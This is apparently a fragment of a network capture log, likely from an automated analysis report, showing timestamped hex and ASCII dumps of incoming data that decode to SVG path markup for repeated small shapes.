                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7973INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 36 39 2e 37 38 2c 31 33 30 2e 32 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d
                                                                                                                                                                                                                                                  Data Ascii: "></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M269.78,130.26a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7989INData Raw: 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 38 2e 37 32 2c 32 32 35 2e 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                  Data Ascii: h><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M308.72,225.62a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8005INData Raw: 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 34 37 2e 36 37 2c 33 32 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32
                                                                                                                                                                                                                                                  Data Ascii: ="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M347.67,321a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8021INData Raw: 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 33 38 2c 31 37 30 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32
                                                                                                                                                                                                                                                  Data Ascii: d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M369.38,170.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8037INData Raw: 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                  Data Ascii: 09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class=
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8053INData Raw: 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 31 33 2c 31 38 34 2e 38 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                  Data Ascii: 3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"></path><path class="cls-9" d="M331.13,184.83a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8069INData Raw: 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 36 2e 36 39 2c 32 36 34 2e 34 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                  Data Ascii: 67,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9" d="M366.69,264.49a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8085INData Raw: 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2c 33 33 36 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32
                                                                                                                                                                                                                                                  Data Ascii: ,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M402,336.08a2,2,0,0,1-.9,2.6,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8101INData Raw: 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61
                                                                                                                                                                                                                                                  Data Ascii: -3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><pa
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8117INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2c 32 36 31 2e 34 34 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c
                                                                                                                                                                                                                                                  Data Ascii: "></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M457,261.44a2,2,0,0,1-.91,2.6,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8133INData Raw: 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 32 35 2c 33 33 33 61 32 2c 32 2c 30 2c 30
                                                                                                                                                                                                                                                  Data Ascii: ,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M492.25,333a2,2,0,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8149INData Raw: 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                  Data Ascii: 2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8165INData Raw: 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 32 34 2c 32 35 38 2e 33 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38
                                                                                                                                                                                                                                                  Data Ascii: 33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.24,258.38a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8181INData Raw: 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                  Data Ascii: 0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8197INData Raw: 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: 38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8213INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 34 38 2c 38 38 2e 37 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c
                                                                                                                                                                                                                                                  Data Ascii: .67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.48,88.71a1.6,1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8229INData Raw: 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 39 2e 38 2c 31 34 36 2e 31 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M389.8,146.16a1.61,1.61,0,0,1-.73,
